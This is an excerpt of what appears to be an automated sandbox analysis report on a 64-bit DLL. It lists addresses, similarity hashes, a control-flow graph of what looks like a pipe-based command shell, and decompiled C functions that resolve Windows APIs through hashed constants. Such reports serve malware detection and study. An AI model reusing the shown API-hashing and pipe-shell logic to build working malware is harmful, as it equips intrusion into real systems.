                  0x180009cbc
                  0x180009cbe
                  0x180009cc3
                  0x180009ce4
                  0x180009cf9
                  0x180009d01
                  0x180009d05
                  0x180009d1e
                  0x180009d26
                  0x180009d2a
                  0x180009d40
                  0x180009d48
                  0x180009d4c
                  0x180009d63
                  0x180009d6b
                  0x180009d6f
                  0x180009d8a
                  0x180009da4
                  0x180009dac
                  0x180009db0
                  0x180009dc3
                  0x180009dcb
                  0x180009dcf
                  0x180009dd8
                  0x180009de1
                  0x180009dfa
                  0x180009e02
                  0x180009e06
                  0x180009e21
                  0x180009e42
                  0x180009e58
                  0x180009e60
                  0x180009e64
                  0x180009e78
                  0x180009e80
                  0x180009e84
                  0x180009e9d
                  0x180009ea0
                  0x180009ea3
                  0x180009eab
                  0x180009eba
                  0x180009ec2
                  0x180009ec6
                  0x180009eda
                  0x180009ee3
                  0x180009eeb
                  0x180009eef
                  0x180009efb
                  0x180009f03
                  0x180009f08
                  0x180009f10
                  0x180009f14
                  0x180009f23
                  0x180009f2b
                  0x180009f2f
                  0x180009f4b
                  0x180009f61
                  0x180009f6e
                  0x180009f74
                  0x180009f81
                  0x180009f8d
                  0x180009f94
                  0x180009f9f
                  0x180009fac
                  0x180009fb3
                  0x180009fc0
                  0x180009fcd
                  0x180009fd1
                  0x180009feb
                  0x18000a007
                  0x18000a014
                  0x18000a01a
                  0x18000a024
                  0x18000a030
                  0x18000a037
                  0x18000a045
                  0x18000a052
                  0x18000a059
                  0x18000a077
                  0x18000a097
                  0x18000a0a6
                  0x18000a0b2
                  0x18000a0b8
                  0x18000a0c5
                  0x18000a0d1
                  0x18000a0d8
                  0x18000a0e4
                  0x18000a0ec
                  0x18000a0f0
                  0x18000a10c
                  0x18000a118
                  0x18000a120
                  0x18000a124
                  0x18000a136
                  0x18000a13e
                  0x18000a142
                  0x18000a14e
                  0x18000a159
                  0x18000a15d
                  0x18000a16a
                  0x18000a172
                  0x18000a176
                  0x18000a188
                  0x18000a19b
                  0x18000a1a3
                  0x18000a1a7
                  0x18000a1b5
                  0x18000a1c0
                  0x18000a1c4
                  0x18000a1d0
                  0x18000a1d8
                  0x18000a1dc
                  0x18000a1e5
                  0x18000a1ed
                  0x18000a1f1
                  0x18000a204
                  0x18000a20c
                  0x18000a210
                  0x18000a22a
                  0x18000a238
                  0x18000a240
                  0x18000a244
                  0x18000a254
                  0x18000a263
                  0x18000a26d
                  0x18000a271
                  0x18000a27e
                  0x18000a28a
                  0x18000a28e
                  0x18000a2a7
                  0x18000a2b5
                  0x18000a2c2
                  0x18000a2c6
                  0x18000a2dc
                  0x18000a2ea
                  0x18000a2f7
                  0x18000a2fb
                  0x18000a305
                  0x18000a311
                  0x18000a315
                  0x18000a32d
                  0x18000a33d
                  0x18000a34a
                  0x18000a34e
                  0x18000a366
                  0x18000a375
                  0x18000a382
                  0x18000a386
                  0x18000a390
                  0x18000a39c
                  0x18000a3a0
                  0x18000a3ad
                  0x18000a3ba
                  0x18000a3be
                  0x18000a3d6
                  0x18000a3e5
                  0x18000a3f2
                  0x18000a3f6
                  0x18000a40e
                  0x18000a411
                  0x18000a425
                  0x18000a437
                  0x18000a43a
                  0x18000a43d
                  0x18000a440
                  0x18000a442
                  0x18000a445
                  0x18000a448
                  0x18000a455
                  0x18000a45e
                  0x18000a470
                  0x18000a478
                  0x18000a47a
                  0x18000a48d

                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                  • Instruction ID: da65757d923d1ece893e98337654064ca0bb37cf04d21ba61795d8811ff59a21
                  • Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                  • Instruction Fuzzy Hash: 5912B4B7B784514BD71CCB19E892FA97792F394308B49912CEA17D3F44DA3DEA06CA40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 474 1800085a0-1800085a8 472->474 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 476 1800085aa CloseHandle 474->476 477 1800085b0-1800085b9 474->477 476->477 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->474 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 491 180008473-180008487 call 180004258 489->491 495 1800084b3 490->495 496 1800084a0-1800084b1 490->496 491->472 491->490 498 1800084b5-1800084b7 495->498 496->498 498->472 500 1800084bd-1800084c4 498->500 501 1800084c6-1800084e4 WriteFile 500->501 502 1800084ee-18000850a WaitForMultipleObjects 500->502 501->472 503 1800084ea 501->503 502->474 504 180008510-180008513 502->504 503->502 505 180008519-18000852a call 18000459c 504->505 506 1800085ba-1800085bf 504->506 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 508 1800085c1 506->508 508->484 512 180008546-18000854c 510->512 511->512 513 180008581 512->513 514 18000854e-18000856f WriteFile 512->514 518 180008583-180008585 513->518 519 1800085c6-1800085cb 513->519 516 180008571-18000857c ResetEvent 514->516 517 18000858b-180008591 GetLastError 514->517 516->484 517->486 518->484 518->517 519->474
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
